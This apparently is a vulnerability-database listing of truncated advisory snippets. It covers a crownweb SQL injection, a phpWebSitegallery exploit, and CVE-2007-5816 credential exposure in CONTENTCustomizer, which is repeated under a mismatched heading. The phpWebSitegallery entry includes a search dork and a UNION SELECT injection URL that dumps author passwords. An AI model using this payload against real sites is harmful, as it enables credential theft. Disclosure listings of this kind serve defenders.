crownweb (page.cfm) SQL Injection Vulnerability

No description provided by source. crownweb page.cfm Sql Injection Vulnerability =================================================================== .:. Email : [email protected] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : crownweb .:. Language : Cfm .:. Script Download:...

phpwebsitegallery-sql.txt

powered by phpWebSitegallery AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAiL : [email protected] DORK 1 : allinurl:"mod.php?mod=gallery" id EXPLOIT : mod.php?mod=gallery&op=gallery&id=-77//union//select+0,concataid,0x3a,pwd//from//authors/where%20gallery...

Default credentials

dialog.php in CONTENTCustomizer 3.1mp and earlier allows remote attackers to obtain sensitive author credentials by making a request with an editauthor action, then reading the value of the newlocalpassword password input field in the HTML source of the resulting page...

CVE-2007-5816

dialog.php in CONTENTCustomizer 3.1mp and earlier allows remote attackers to obtain sensitive author credentials by making a request with an editauthor action, then reading the value of the newlocalpassword password input field in the HTML source of the resulting page...

CVE-2007-5816

The CVE-2007-5816 issue affects CONTENTCustomizer 3.1mp and earlier, where dialog.php allows a remote attacker to obtain sensitive author credentials by issuing an editauthor action and then reading the newlocalpassword input field in the resulting HTML. The underlying cause is exposure of a pass...